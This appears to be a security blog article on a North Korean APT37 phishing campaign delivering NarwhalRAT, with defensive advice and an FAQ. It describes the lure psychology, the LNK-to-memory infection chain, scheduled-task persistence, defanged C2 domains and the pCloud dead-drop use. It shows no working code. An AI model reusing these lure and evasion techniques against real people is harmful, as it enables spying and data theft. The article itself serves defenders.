You receive an email. It looks like it is from Microsoft. It warns about suspicious activity on your Microsoft Account. Someone is generating one-time passwords repeatedly. It might be a phishing attempt. Change your password now. Refer to the attached advisory.
You open the attachment. It is not a document. It is a ZIP file containing a shortcut. You click it.
Congratulations. You just invited ScarCruft into your system.
The North Korean state-sponsored hacking group, also known as APT37, has been using this exact lure to deliver a new Python-based remote access tool called NarwhalRAT. The ScarCruft NarwhalRAT malware campaign targets users who would never fall for a poorly written phishing email, but might panic at the thought of their Microsoft account being compromised.
The Spear-Phishing Lure
Quick Security Checklist
- Scan your system or website
- Update all dependencies
- Change passwords
- Enable 2FA
The researchers at Genians Security Center have provided further details regarding the fraud that was perpetrated against them. It was an email that purported to be from Microsoft, warning them about problems with their account due to repeated OTP (One-Time Password) requests being made.
The email was designed to induce a feeling of urgency in users and to cause concern about whether their account may have been compromised.
In addition, an email directed users to find an attachment that would contain an advisory document; however, there was no HWP file attached to the email; rather, there was a ZIP file containing a malicious LNK file.
The psychological approach taken with regard to the attack was as follows:
1. Fear of being a victim of an account compromise
2. Urgency to take action
3. Trust in an email sent from "Microsoft"
4. Assured safety by opening an attachment
As such, the individual that fell for this attack was not actually installing malware by their own free will. They simply acted on what they believed was legitimate security advice.
How The Infection Is Created
Malware from the ScarCruft Narwhal RAT group employs a complex multi-level infection process that evades detection and leaves little forensics evidence behind.
Stage 1: First, the LNK file is the first point of entry into the malware infection. When the LNK file is clicked, it executes a chain of intermediary batch scripts that download additional components from remote servers.
Stage 2: Next, malware grabs a legitimate Python binary from the official website. The use of legitimate executables is a typical evasion method utilized by cybercriminals.
Stage 3: In third stage of the malware’s download process, a Windows security catalog (CAT) file is downloaded to enable persistent and in-memory execution of the malware.
Stage 4: Finally, the malware creates a scheduled task named MicrosoftUserInterfacePicturesUpdateTaskMachine. The scheduled task is configured to launch the CAT file, causing the main payload to be completely executed from memory. No malicious files are left on the disk.
How NarwhalRAT Works
NarwhalRAT, created using Python, has many different types of abilities related to stealing personal information:
1. It records every keystroke you make.
2. It takes screenshots of your computer, including high-quality images.
3. It records any sound in the room via your computer's microphone.
4. It sends all the files you have on your computer (including anything on an external drive) to the hacker.
5. It tracks which windows you've opened up on your computer at any given time.
6. It collects information from removable storage devices (i.e., USB drives).
7. It follows instructions given by the Command and Control server and executes them on your computer.
8. It can switch Command and Control servers as needed.
ScarCruft also has an interesting way of storing the information it has stolen; it creates a hidden folder with the name Naver Whale (which is a legitimate web browser made by a South Korean company called Naver Corporation) to disguise the data it has been stealing from you.
The Command and Control Infrastructure
ScarCruft employs a complex, multilayered Command and Control (C2) infrastructure that provides resilience against C2 takedown.
Primary C2 Channels
ScarCruft employs Korean websites as its primary communication channels.
1. daehoat[.]com
2. novel21[.]co.kr
Secondary C2 Channels - Dead Drop Resolver
ScarCruft also employs the pCloud cloud storage service API to provide a method of communicating using a dead drop resolver; it uses the folderid and auth parameters of pCloud to establish a valid dead drop resolver from which to communicate. It is improbable that legitimate cloud storage services are blocked, making it an excellent alternative for a resilient fallback method to communicate.
NarwhalRAT vs. RokRAT
This campaign marks a departure from ScarCruft's previously exclusive use of RokRAT. NarwhalRAT is a different family, built in Python rather than compiled C++. The shift suggests the group is evolving its toolset.
Genians noted that the ScarCruft NarwhalRAT malware campaign shares "multiple similarities" with prior Python-based attacks by APT37. The group has used similar LNK-driven infection chains with ticket confirmations and event invitations as lures.
The scheduled task naming convention also follows a pattern. While NarwhalRAT uses MicrosoftUserInterfacePicturesUpdateTackMachine, a previous campaign used MicrosoftMusicLibrariesPackageTaskMachine. The similarity suggests the same developers or a shared playbook.
Who is ScarCruft?
ScarCruft is a North Korean state-sponsored hacking group and is tracked as APT37. The group has been targeting various sectors of the South Korean government and military, as well as diplomatic organizations, media outlets, human rights activists and think tanks/academics for several years.
The group is known to be capable of highly sophisticated spear phishing tactics. One of the most advanced methods used by this group is to use highly relatable or timely themes when creating their spear-phishing emails.
The most recent type of spear phishing email that they sent was an email impersonating a Microsoft Account security alert, which was new for this group, but consistent with their traditional tactics.
How to Protect Yourself
The ScarCruft NarwhalRAT malware campaign relies on user interaction. That means your behavior is the best defense.
For individuals:
1. Never open attachments from unsolicited emails, even if they appear to come from Microsoft.
2. If you get a security alert by email, do not click on any links or attachments in the email itself; instead, go directly to the website of the organisation concerned to see what your current account status is.
3. You should also be mindful of how "urgent" the email sounds because scams can encourage you into responding quickly and encourage you not to think about your actions before acting.
4. Look at the sender's email address closely. Microsoft will only send security alerts from legitimate email addresses such as Microsoft and won't send them from generic Gmail/Outlook accounts.
For organizations:
1. Train your users on impersonation attacks so they are aware of what to look for and avoid falling victim to them.
2. Block the sending of LNK files whenever possible via email; an LNK file is typically how a first step of a successful attack will be performed.
3. Look for scheduled task creation in the system using a display name following the pattern of MicrosoftUserInterfacePicturesUpdateTackMachine to detect if your organization has been attacked.
4. Monitor outbound network traffic to any IP address located in Korea where your organization does not normally do business.
5. Track any pCloud API requests made to your organization using folderid and auth parameters.
The ScarCruft NarwhalRAT malware campaign illustrates how threat actors will continually evolve to evade detection. The mode of operation has changed from RokRAT to Python-based, with execution in memory with cloud-based C2 resilience.
FAQ Section
What is NarwhalRAT?
NarwhalRAT is an R.A.T that the North Korean cyber crime syndicate known as ScarCruft (APT37) has developed using Python. NarwhalRAT has many capabilities such as keylogging, screen capturing, audio recording, uploading files to the command and control server, and command and control channel switching.
How does the NarwhalRAT malware campaign initiated from ScarCruft work?
A spear-phishing email impersonating a Microsoft Account security alert is sent to the recipient of the spear-phishing email with instructions to click on the attached file, which is actually an LNK file contained within a ZIP file.
What happens once the LNK file is executed by the recipient?
When the recipient executes the LNK file, a multi-stage infection chain occurs resulting in the download of a legitimate Python binary, downloading of a CAT file, and the download of the NarwhalRAT payload. In addition, the NarwhalRAT payload is implemented with persistence via a scheduled task, and the after effects of the NarwhalRAT payload are executed in memory.
How does NarwhalRAT communicate with its command and control server?
NarwhalRAT communicates with the command and control servers of its operators using Korean websites (i.e., daehoat[.]com and novel21[.]co.kr) as its primary command and control servers, and also communicates with its operators via pCloud cloud storage API as a secondary command and control server using a dead drop resolver.
Is this related to RokRAT?
NarwhalRAT is a separate malware family. ScarCruft previously used RokRAT exclusively, but this campaign marks a departure from that pattern.
How can I avoid falling victim?
Never open attachments from unsolicited emails. Verify security alerts by going directly to the official website. Be suspicious of urgent language. Block LNK files in email when possible.
